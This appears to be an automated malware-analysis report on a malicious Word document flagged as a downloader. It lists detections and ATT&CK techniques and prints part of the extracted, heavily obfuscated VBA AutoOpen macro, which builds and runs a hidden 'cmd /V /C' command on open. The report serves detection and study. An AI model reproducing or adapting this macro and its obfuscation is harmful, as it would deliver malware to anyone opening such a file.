Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening. The macro attempts to construct and execute a command, likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Juju-6799075-0' further supports its malicious nature as a downloader.
Heuristics: 5

- ClamAV: Doc.Downloader.Juju-6799075-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Juju-6799075-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23821 bytes |

SHA-256 of macros.bas: 86c5f63114fd341dacb9dfb5a124faa3613691ddeacbdae80e052f55ecbf15db
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ObaErKVQz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName cShuS
TypeName Chr(LlzFt / sYkazu + JGlwDP / azslpw)
TypeName 9
TypeName sMQuw
TypeName Rnd(5)
TypeName 2244
Shell! KeyString(vbKeyC) + DliVmfiQHo + zVATRGWjiqDn + jQIYhP + LvurYk + DzOkMsrmm + kldKdwY + acTAojqdcOi + zPjJIZaNDEV + fOiuQoI + AboZOPfJ + NJGiNKi + oBYVdoVCq + tpsTYrk + pWMzYbUVc + MuKdrPsFXM + KolSLSCsWsN + LXOGh + QNWbDiwbm + WkWjdYF, 348542161 - 348542161
TypeName CBool(iqibm)
TypeName Cos(MpwAk)
TypeName 9762
End Sub
Attribute VB_Name = "EjvdAub"
Function jQIYhP()
On Error Resume Next
TypeName Sgn(rAlEz)
TypeName WSNdI
qBsqvlHwP = "m" + "d" + " /" + "V " + " " + " /"
TypeName 68
TypeName 220634239
lbYUiRvdS = CStr(Chr(USOSBvAACiUnn + OopaTsBCL + 67 + QSFHQvmBkwi + spINiubt)) + " " + " " + CStr(Chr(UtlEjzTPDla + vuRYAmiSjAfi + 34 + nTRFhtmkOfrD + jbCkMHNTR)) + "se" + "t " + " K" + "8=" + "EPB"
TypeName Chr(135818028)
TypeName CLng(7)
plLYYcZjb = "i" + CStr(Chr(GnNlsGVFOjw + tlwKjmhwiSm + 99 + uVWVTCwdaFZzVY + pkjqWqaKCniofY)) + "Vv" + "rR" + CStr(Chr(iuLzjsNupCT + LKNLwthCQc + 99 + LTfXHwBjwVbNVO + pBTWuorcRd)) + "p" + "jT" + "G" + "f;H" + "xs" + "}" + "ezy"
TypeName Cos(3)
TypeName CStr(8595 * KwQJZz)
TypeName 9413
rDzmFFQI = "W 0" + "S," + "(k" + "M" + "){" + "mh:"
TypeName 6948
TypeName Sgn(33403 + 81924)
TypeName ChrW(78602 - 6667)
jzMlWOqRE = "g" + "=+I" + "D" + "u" + CStr(Chr(oYNSGFXZhWh + wYqjApkwK + 76 + IiAXbCGiR + ZHIGQqXpSTPEwP)) + "3" + "-." + "F6n" + "o9" + "b4" + CStr(Chr(QowidMwJYEAzi + muAwjau + 67 + YUtvtdCHbJqqVo + IzhLqZKCQ))
TypeName jktjd
TypeName 4998
JZiXm = "wtq" + "U$@" + "A" + "\/" + "Na" + CStr(Chr(zQRSVPCJ + DQuCsWVaM + 108 + ilbbMMDz + iQTEqJqUaTiJv)) + "d" + "'" + "&& "
TypeName Atn(MEwRpo)
TypeName 574
TypeName 185356805
cQwcbU = "fo" + "r %" + "o i" + "n " + " ( " + " " + "10" + " " + " ," + " " + " 49" + ", " + " 54"
TypeName Hex(129972124)
TypeName PdPdq
WVOsHf = ", 2" + "0 " + " " + ", " + "7 " + " ,"
TypeName Log(UIAEGY)
TypeName PnGAQ
CSkrHChCnM = " " + " " + "18 " + " " + "," + " " + " " + "34" + ", "
TypeName RHiCmj
TypeName CInt(46165 * MrCzOq)
TypeName Rnd(1700)
KJnCQAjK = " " + "2" + "0, " + " " + "65 " + " " + ",65" + " ,"
TypeName Chr(46871 - ZHzaaY - 48036 / 59)
TypeName 35
EhAwICu = " " + "2" + "4, " + " " + " "
jQIYhP = qBsqvlHwP + lbYUiRvdS + plLYYcZjb + rDzmFFQI + jzMlWOqRE + JZiXm + cQwcbU + WVOsHf + CSkrHChCnM + KJnCQAjK + EhAwICu
TypeName Sgn(4)
TypeName 745
End Function
Function LvurYk()
On Error Resume Next
TypeName dczkFS
TypeName Tan(LHjmN - XiTqj / fPRbap - NSqRkn)
jvBfsLEF = " " + "5" + "8" + " " + " ,4" + "2" + " " + " " + " " + ", " + "14 " + " ," + " "
TypeName CDate(JqtKOK * KQctE)
TypeName XMSHT
TypeName TrmLwJ
cjANRnZC = " " + " 3" + " ," + " 3" + "7 "
TypeName wAsQHH
TypeName CDate(5963)
SNWiPSOSH = " ," + "48" + " " + ", " + "2" + "0 " + " " + ",54" + " " + " , " + " "
TypeName CInt(89134 + wkndrD)
TypeName 38
VJRYppsCz = " 44" + " " + " ," + " " + " 49"
TypeName Chr(uCtwzB)
TypeName 36
TypeName Cos(51282 - RdsnKG - 85782 + ilSOQl)
OuiHwjtKf = " " + ", " + " 51" + " " + " " + " " + " ," + " " + " " + " 11"
TypeName mlpXQ
TypeName CDbl(4)
JKvlrmGTnv = " " + " , " + " " + "20," + " " + " 9 " + ", " + " 5" + "5 " + ", " + " 24" + " " + " "
LvurYk = jvBfsLEF + cjANRnZC + SNWiPSOSH + VJRYppsCz + OuiHwjtKf + JKvlrmGTnv
TypeName Sgn(wUHFVt)
TypeName LUszT
TypeName ChrB(CaWbf)
End Function
Function DzOkMsrmm()
On Error Resume Next
TypeName CSng(68823 + fQtlK + vmiLH - WYPYK)
TypeName rvXSAd
oGVXLdF = ",6" + "3 " + " " + " ," + " " + " " + "20" + " " + " " + ", " + " 5"
TypeName
```

... (truncated)